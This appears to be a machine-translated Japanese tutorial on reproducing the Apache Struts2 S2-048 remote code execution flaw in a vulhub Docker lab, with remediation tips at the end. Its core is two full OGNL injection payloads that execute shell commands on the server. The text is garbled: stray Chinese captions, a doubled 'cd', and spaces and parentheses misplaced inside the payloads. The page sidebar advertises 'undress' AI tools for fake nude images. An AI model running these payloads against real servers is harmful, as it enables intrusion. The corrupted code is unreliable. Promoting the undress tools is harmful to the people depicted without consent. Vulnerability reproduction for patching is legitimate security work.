検索
ホームページ運用・保守安全性Apache Struts2--048 リモート コード実行の脆弱性を再現する方法

0x00はじめに

Struts2 フレームワークは、Java EE Web アプリケーションを開発するためのオープンソース Web アプリケーション アーキテクチャです。 Java Servlet API を利用および拡張し、開発者が MVC アーキテクチャを採用することを奨励します。 Struts2 は、WebWork の優れた設計アイデアをコアとして採用し、Struts フレームワークのいくつかの利点を吸収し、MVC 設計パターンで実装されたより整った Web アプリケーション フレームワークを提供します。

0x01 脆弱性の概要

Apache Struts2 2.3.x シリーズでは、struts2-struts1-plugin プラグインが有効になっており、struts2-showcase ディレクトリが存在することが、ActionMessage が顧客が制御可能なパラメーター データを受信するときに発生します。後続のデータ スプライシングが渡される 不適切な後処理により、任意のコードが実行される

0x02 影響範囲

struts2-struts1-plugin プラグインが有効になっている Apache Struts 2.3.x シリーズのバージョン。

0x03環境構築

1. Apache Struts2を自前で構築する場合は、vulhubのdocker環境を利用して構築します。

ダウンロードアドレス: https://github.com/vulhub/vulhub

2. ダウンロード後、解凍して s2-048 ディレクトリに入り、脆弱性環境を起動します

cd cd vulhub-master/struts2/s2-048/ //ディレクトリを入力します

怎么进行Apache Struts2--048远程代码执行漏洞复现

docker-compose up -d //射撃場を開始します

怎么进行Apache Struts2--048远程代码执行漏洞复现

3. docker psを使用して起動が成功したかどうかを確認します

怎么进行Apache Struts2--048远程代码执行漏洞复现

4. http:your-を入力します。ブラウザの .action で ip:8080/hello、次のページ環境が設定されていることを確認します

怎么进行Apache Struts2--048远程代码执行漏洞复现

0x04 脆弱性の再発

1 ブラウザに次のリンクを入力して、脆弱性ページにアクセスします

http ://192.168.3.160:8080/integration/saveGangster.action

怎么进行Apache Struts2--048远程代码执行漏洞复现

2. 最初のフォーム「Gangster Name」に ${1+1} と入力し、送信をクリックして実行された OGNL を表示します。式

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现

2.「Gangster Name」で、${1+1} を次のコマンドで実行されるペイロード ステートメントに変更します

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)。(# _memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl. OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames() .clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@ org.apache.commons.io.IOUtils@toString(@ java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现

3 Burp を使用してパケットをキャプチャし、コマンド実行用のペイロードに変更することもできます

注: ペイロードは URL エンコードする必要があります

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess) ?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil) @class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe) ','/c',#cmd}:{'/bin/bash',' -c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p. redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons. io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现

4. 自動スクリプトまたはグラフィカル ツールを使用して実装できますが、ここでは説明しません。

ツールはGitHubで検索してダウンロードできます

0x05の修復提案

1. アップグレード最新バージョンにアップグレードすることをお勧めします

2. ビジネスの状況に応じて、struts-2.3を無効にして閉じる(削除)します。 .xappsstruts2-showcase.war パッケージ

以上がApache Struts2--048 リモート コード実行の脆弱性を再現する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明
この記事は亿速云で複製されています。侵害がある場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser は、オンライン試験を安全に受験するための安全なブラウザ環境です。このソフトウェアは、あらゆるコンピュータを安全なワークステーションに変えます。あらゆるユーティリティへのアクセスを制御し、学生が無許可のリソースを使用するのを防ぎます。

SublimeText3 Linux 新バージョン

SublimeText3 Linux 新バージョン

SublimeText3 Linux 最新バージョン

MantisBT

MantisBT

Mantis は、製品の欠陥追跡を支援するために設計された、導入が簡単な Web ベースの欠陥追跡ツールです。 PHP、MySQL、Web サーバーが必要です。デモおよびホスティング サービスをチェックしてください。

WebStorm Mac版

WebStorm Mac版

便利なJavaScript開発ツール